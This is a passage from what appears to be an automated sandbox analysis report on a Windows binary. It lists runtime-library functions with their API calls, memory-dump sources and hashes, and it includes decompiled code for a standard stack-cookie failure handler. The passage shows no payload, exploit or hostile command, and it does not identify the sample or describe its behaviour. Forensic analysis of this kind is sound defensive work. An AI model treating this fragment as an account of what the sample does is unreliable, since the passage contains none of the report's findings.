                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3322701435-0
                                                                                                                                                                                          • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                                          • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                                                                                                                          • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040AF66, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _malloc.LIBCMT ref: 0040AF80
                                                                                                                                                                                            • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                                                            • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                                                            • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                                                                          • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                                                                                            • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1411284514-0
                                                                                                                                                                                          • Opcode ID: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
                                                                                                                                                                                          • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                                                                                          • Opcode Fuzzy Hash: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
                                                                                                                                                                                          • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040E7EE, Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ___crtCorExitProcess.LIBCMT ref: 0040E7F6
                                                                                                                                                                                            • Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
                                                                                                                                                                                            • Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
                                                                                                                                                                                            • Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0040E7FF
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2427264223-0
                                                                                                                                                                                          • Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                                                                                                                                          • Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                                                                                                                                          • Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040D534, Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateHeap
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 10892065-0
                                                                                                                                                                                          • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                                                                          • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                                                                                                                                          • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                                                                          • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040EA0A, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _doexit.LIBCMT ref: 0040EA16
                                                                                                                                                                                            • Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
                                                                                                                                                                                            • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
                                                                                                                                                                                            • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
                                                                                                                                                                                            • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
                                                                                                                                                                                            • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
                                                                                                                                                                                            • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
                                                                                                                                                                                            • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
                                                                                                                                                                                            • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1597249276-0
                                                                                                                                                                                          • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                                                                          • Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
                                                                                                                                                                                          • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                                                                          • Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0309D72C, Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.435077109.000000000309D000.00000040.00000001.sdmp, Offset: 0309D000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 3374b8a112f4b9dbab445f211546730d874fcce9c687055d4a45a5890a911f04
                                                                                                                                                                                          • Instruction ID: d54602e627a9cfead3b55359874649844e6c529163353671f0f15c6d3b14db07
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3374b8a112f4b9dbab445f211546730d874fcce9c687055d4a45a5890a911f04
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C21F2B5544240DFEF04CF24D8C4B6BFBA5FB84324F24C9AAE8094B696D336D806DA61
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0309D57C, Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.435077109.000000000309D000.00000040.00000001.sdmp, Offset: 0309D000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: dcce79a50bd3b9828027b8d400509b922958f1b7bb726631bf2c493dd28a9f78
                                                                                                                                                                                          • Instruction ID: 1eaf3432ad065fc3df45eaa918903927e8434645d9e4be361ceed3113f68c9b3
                                                                                                                                                                                          • Opcode Fuzzy Hash: dcce79a50bd3b9828027b8d400509b922958f1b7bb726631bf2c493dd28a9f78
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2621F975545340DFEF00DF14D5C4B5AFBA5FB84328F24C96AD8494B646C336E805D761
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0309D727, Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.435077109.000000000309D000.00000040.00000001.sdmp, Offset: 0309D000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: a47bfe4a6bcf5fbe28d2fe1ba74eb04fc99507f7a93f0834f9ae9777d6a011be
                                                                                                                                                                                          • Instruction ID: 133afb4dcff2d733aecad27d377c5f66927c817b7ab4ab76855b5daf2546361f
                                                                                                                                                                                          • Opcode Fuzzy Hash: a47bfe4a6bcf5fbe28d2fe1ba74eb04fc99507f7a93f0834f9ae9777d6a011be
                                                                                                                                                                                          • Instruction Fuzzy Hash: DB11BE79544280DFDB01CF14D9C4B16FFA1FB84224F28C6AAD8494B696C33AD40ACB61
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0309D577, Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.435077109.000000000309D000.00000040.00000001.sdmp, Offset: 0309D000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: e53ffd709b012e936f9f2aa6718087a60dd889b8a1e82929efd72d2b2caa1cb9
                                                                                                                                                                                          • Instruction ID: a83ad0c5c86fff735b0569d27dec8abf9385e0a95b30531bc94c6a5be0f52a02
                                                                                                                                                                                          • Opcode Fuzzy Hash: e53ffd709b012e936f9f2aa6718087a60dd889b8a1e82929efd72d2b2caa1cb9
                                                                                                                                                                                          • Instruction Fuzzy Hash: FF119D75545280DFDF11DF14D5C4B15FFA1FB84324F28C6AAD8484B656C33AE41ACBA2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          Function 0040CE09, Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                          			E0040CE09(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x422234; // 0x4c5fa4f
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x423b98 = _t6;
				 *0x423b94 = _t22;
				 *0x423b90 = _t25;
				 *0x423b8c = _t21;
				 *0x423b88 = _t27;
				 *0x423b84 = _t26;
				 *0x423bb0 = ss;
				 *0x423ba4 = cs;
				 *0x423b80 = ds;
				 *0x423b7c = es;
				 *0x423b78 = fs;
				 *0x423b74 = gs;
				asm("pushfd");
				_pop( *0x423ba8);
				 *0x423b9c =  *_t31;
				 *0x423ba0 = _v0;
				 *0x423bac =  &_a4;
				 *0x423ae8 = 0x10001;
				_t11 =  *0x423ba0; // 0x0
				 *0x423a9c = _t11;
				 *0x423a90 = 0xc0000409;
				 *0x423a94 = 1;
				_t12 =  *0x422234; // 0x4c5fa4f
				_v812 = _t12;
				_t13 =  *0x422238; // 0xfb3a05b0
				_v808 = _t13;
				 *0x423ae0 = IsDebuggerPresent();
				_push(1);
				E004138FC(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x41fb80);
				if( *0x423ae0 == 0) {
					_push(1);
					E004138FC(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                                                                                                                                                          0x0040ce09
                                                                                                                                                                                          0x0040ce09
                                                                                                                                                                                          0x0040ce09
                                                                                                                                                                                          0x0040ce09
                                                                                                                                                                                          0x0040ce09
                                                                                                                                                                                          0x0040ce09
                                                                                                                                                                                          0x0040ce09
                                                                                                                                                                                          0x0040ce0f
                                                                                                                                                                                          0x0040ce11
                                                                                                                                                                                          0x0040ce11
                                                                                                                                                                                          0x00413644
                                                                                                                                                                                          0x00413649
                                                                                                                                                                                          0x0041364f
                                                                                                                                                                                          0x00413655
                                                                                                                                                                                          0x0041365b
                                                                                                                                                                                          0x00413661
                                                                                                                                                                                          0x00413667
                                                                                                                                                                                          0x0041366e
                                                                                                                                                                                          0x00413675
                                                                                                                                                                                          0x0041367c
                                                                                                                                                                                          0x00413683
                                                                                                                                                                                          0x0041368a
                                                                                                                                                                                          0x00413691
                                                                                                                                                                                          0x00413692
                                                                                                                                                                                          0x0041369b
                                                                                                                                                                                          0x004136a3
                                                                                                                                                                                          0x004136ab
                                                                                                                                                                                          0x004136b6
                                                                                                                                                                                          0x004136c0
                                                                                                                                                                                          0x004136c5
                                                                                                                                                                                          0x004136ca
                                                                                                                                                                                          0x004136d4
                                                                                                                                                                                          0x004136de
                                                                                                                                                                                          0x004136e3
                                                                                                                                                                                          0x004136e9
                                                                                                                                                                                          0x004136ee
                                                                                                                                                                                          0x004136fa
                                                                                                                                                                                          0x004136ff
                                                                                                                                                                                          0x00413701
                                                                                                                                                                                          0x00413709
                                                                                                                                                                                          0x00413714
                                                                                                                                                                                          0x00413721
                                                                                                                                                                                          0x00413723
                                                                                                                                                                                          0x00413725
                                                                                                                                                                                          0x0041372a
                                                                                                                                                                                          0x0041373e

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2579439406-0
                                                                                                                                                                                          • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                          • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                          • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00408C60, Relevance: 2.9, Strings: 2, Instructions: 377COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: @$@
                                                                                                                                                                                          • API String ID: 0-149943524
                                                                                                                                                                                          • Opcode ID: 524773d1bc2011db47f0014430bcd25baf081f96639b8f8b2c6f9a821cea509b
                                                                                                                                                                                          • Instruction ID: 284407f43597d2b1529aa5dbb826e4f49811f0ea4eaa41d9cabafce47d44ff82
                                                                                                                                                                                          • Opcode Fuzzy Hash: 524773d1bc2011db47f0014430bcd25baf081f96639b8f8b2c6f9a821cea509b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 64E159316083418FC724DF28C58066BB7E1AFD9314F14493EE8C5A7391EB79D949CB8A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040ADB0, Relevance: 2.5, APIs: 2, Instructions: 23memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$FreeProcess
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3859560861-0
                                                                                                                                                                                          • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                                                                          • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                                                                                                                                          • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                                                                          • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004123F1, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                                          • Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                                                                                          • Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                                                                                          • Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00407C3F, Relevance: .8, Instructions: 783COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 8976f0a61fc1960936828f21bd26f3318fd330ab7a4f50ce487ee3b945538f04
                                                                                                                                                                                          • Instruction ID: d5e3495c9826dce769b252ea72d1bcaf7b5d46a24141b332915225fd3cdae7ad
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8976f0a61fc1960936828f21bd26f3318fd330ab7a4f50ce487ee3b945538f04
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9852A471A047129FC708CF29C99066AB7E1FF88304F044A3EE896E7B81D739E955CB95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004073A0, Relevance: .6, Instructions: 633COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 20055dc05f39624d89f9d13173d00032c9ddb5f23ed3028259e70998ae7a08b4
                                                                                                                                                                                          • Instruction ID: 17d22deff8d32e931318445bbea846c6b698fa6fcc44f6923348d96d7e24b863
                                                                                                                                                                                          • Opcode Fuzzy Hash: 20055dc05f39624d89f9d13173d00032c9ddb5f23ed3028259e70998ae7a08b4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A329E70A087029FD318CF29C98472AB7E1BF84304F148A3EE89567781D779E955CBDA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406CA0, Relevance: .4, Instructions: 401COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 020392db844ceed98276714fd2150c2ad4a639f6bad3fb02a1d0621011a6745a
                                                                                                                                                                                          • Instruction ID: cc67e10771130af0a5279b37c8f7fa75a2653c997645fd1ae8a0b8309c7f2627
                                                                                                                                                                                          • Opcode Fuzzy Hash: 020392db844ceed98276714fd2150c2ad4a639f6bad3fb02a1d0621011a6745a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 48E1D6306083514FC708CF28C99456ABBE2EFC5304F198A7EE8D68B386D779D94ACB55
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00402B90, Relevance: .2, Instructions: 212COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 519d71d31dfe2b71d65c539f7253ce4d0ce1a0c509a5eaaf561cac07154b4855
                                                                                                                                                                                          • Instruction ID: 74c1b90a01db230de662c72faab58802bb742d928f34651097fec506a9751401
                                                                                                                                                                                          • Opcode Fuzzy Hash: 519d71d31dfe2b71d65c539f7253ce4d0ce1a0c509a5eaaf561cac07154b4855
                                                                                                                                                                                          • Instruction Fuzzy Hash: 15717072A9155347E39CCF5CECD17763713DBC5351F49C23ACA025B6EAC938A922C688
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004028B0, Relevance: .2, Instructions: 184COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 56d4400f77c04dc4446d24fbb084ed78fa0beaad766ef6ff58d44a670f1be69a
